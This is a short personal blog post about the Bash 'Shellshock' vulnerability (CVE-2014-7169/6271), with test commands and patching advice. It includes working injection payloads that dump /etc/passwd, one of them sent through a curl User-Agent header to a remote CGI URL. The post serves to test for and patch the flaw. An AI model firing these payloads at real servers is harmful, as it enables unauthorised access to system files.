CVE-2014-7169 – Bash specially-crafted environment variables code injection attack
I wrote this couple of weeks ago, however due to the very busy schedule I had no access to the doc as it was on a different device, however here we go..
You don’t get CVSS v2 Base Score rating 10.0 vulnerabilities very day, and this is that moment you get some bad ass ones like that. If you running the following (please refer to the link )bash version you might be vulnerable,
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
To check the running bash version do as follows;
root@ubuntu:~# bash –version
bash –version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
if you need more info go with /bin/bash -v
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables.
If you want to see your system is vulnerable for this bug run the following command. If it’s vulnerable you know what to expect on the screen right? 😉
env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
env x='() { :;}; echo “Bagbash: ” $(</etc/passwd)' bash -c "echo this is a test"
curl -v -A '() { :;}; echo "Bagbash: " $(</etc/passwd)' http://IP_or_FQDN/cgi-bin/status
"Bagbash: " $(</etc/passwd)'
If you see that; go patch your self! (Well you have other alternatives too, but easier one would be patching I believe) Go, coz you have an msf exploit for this already. To upgrade the systems there are many ways right, I'm not interested in how you want to update it but you can try following;
$ sudo apt-get update
$ sudo apt-get dist-upgrade
After you patched your systems or if its not vulnerable you should see an error importing function definition for `x' when you run the above test case.
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
Once again, Happy Patching!!
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
http://seclists.org/oss-sec/2014/q3/649
CC's Security Journal 